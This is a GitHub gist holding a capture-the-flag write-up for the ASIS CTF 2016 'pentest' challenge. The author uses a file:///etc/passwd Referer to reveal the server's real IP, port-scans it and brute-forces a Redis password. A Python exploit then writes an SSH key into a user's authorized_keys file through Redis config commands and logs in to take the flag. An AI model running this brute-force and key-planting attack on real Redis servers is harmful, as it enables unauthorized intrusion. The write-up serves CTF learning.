Skip to content

Instantly share code, notes, and snippets.

@stypr stypr/
Last active Jun 22, 2019

What would you like to do?
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/


We got a suspicious web service which does nothing at all. If you have time to test it, please help me to leak out all data from it. Thanks!

Hint: The server keeps your access log on submission.


By searching around for a bit, contact.php had a very suspicious content.

<h5>By clicking send button, you hereby agree that all your access information are allowed to be reviewed.<h4>
<!-- Note: It's all for analytics.. Don't worry, we won't harm you. -->

By analyzing the contact.php, there was a weird URL check in Referer header.

POST /contact.php HTTP/1.1
Connection: keep-alive
Content-Length: 109
Pragma: no-cache
Cache-Control: no-cache
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-CN;q=0.2,zh;q=0.2
Referer: file:///etc/passwd
Cookie: __cfduid=d22559f51eaf8ee0cd770a1564dc3f8f81473527951


HTTP/1.1 200 OK
Date: Sun, 11 Sep 2016 15:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare-nginx
CF-RAY: 2e0c1e2bbfde3a54-ICN

(... skipped some tags ..)
<div id="body">Invalid

Then I changed the Referer to and got an real IP address of the domain.

For further pentesting, I assumed that discovering real IP would be the best (cloudflare is a cdn service for websites, so it won't point out server's IP addresses.) way to work out, to inspect deeper parts of service. (-) [11/Sep/2016:12:31:48 +0900] "GET /test.php HTTP/1.1" 200 505 "-" 0.005

From here, I used nmap to see if there are any vulnerable ports open.

$ nmap -sT -p1024-10240

Starting Nmap 7.01 ( ) at 2016-09-11 12:41 JST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 00:27 (0:00:33 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.48% done; ETC: 00:27 (0:00:17 remaining)
Nmap scan report for (
Host is up (0.11s latency).
Not shown: 10157 closed ports
3702/tcp filtered unknown
6226/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds

Then I connected to the 6226 port to check for available commands, and then realized that it was redis running behind.

$ nc 6226
-ERR unknown command 'HELP'
-NOAUTH Authentication required.
AUTH stypr
-ERR invalid password

There are a lot of redis brute force attacking tools available online, however, I made my own brute forcer since it's easy to make and tools like enteletaor didn't work out well.

I used the top 10000 password wordlist and got the correct authentication with the password crunch.

Then I looked and googled for any possible redis vulnerability and found this good resource.

Now the only left part to find is to look for the correct username.

Since that the website was made by acid (as seen in footer of the website), I assumed the username is acid and wrote an exploit for the challenge.

Please check to view the sourcecode.

$ python
Password: crunch
                                                Connection to closed.



#!/usr/bin/python -u
#-*- coding: utf-8 -*-
#Exploit reference:
from pwn import *
import os
import socket
import time
def check_pass(host, port, pw):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall("AUTH %s\n" % (pw,))
if 'OK' in s.recv(1024):
return True
return False
return False
HOST = ''
PORT = 6226
# gen pubkey payload
PUBKEY = '\n\nssh-rsa (REDACTED) root@stypr\n\n'
f = open("payload.txt", "w")
# bruteforce for password (top 10k)
word_list = file('word.txt').readlines()
for i in word_list:
check = check_pass(HOST, PORT, i)
if check:
# push payload
print("Password: %s" % (i,))
os.system("redis-cli -h %s -p %s -a %s flushall" % (HOST, PORT, i,))
os.system("cat ./payload.txt | redis-cli -h %s -p %s -a %s -x set pwn" % (HOST, PORT, i,))
# set config
os.system("redis-cli -h %s -p %s -a %s config set dir /home/acid/.ssh" % (HOST, PORT, i,))
os.system("redis-cli -h %s -p %s -a %s config set dbfilename \"authorized_keys\"" % (HOST, PORT, i))
# save db
os.system("redis-cli -h %s -p %s -a %s save" % (HOST, PORT, i))
# wait
# ssh to get the flag
os.system("ssh acid@%s" % (HOST))
# ASIS{55ab63e61cac968dd1da217dab2d86b8}

This comment has been minimized.

Copy link

commented Sep 12, 2016

Good job!

Nice writeup, ty.


This comment has been minimized.

Copy link

commented Sep 13, 2016


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.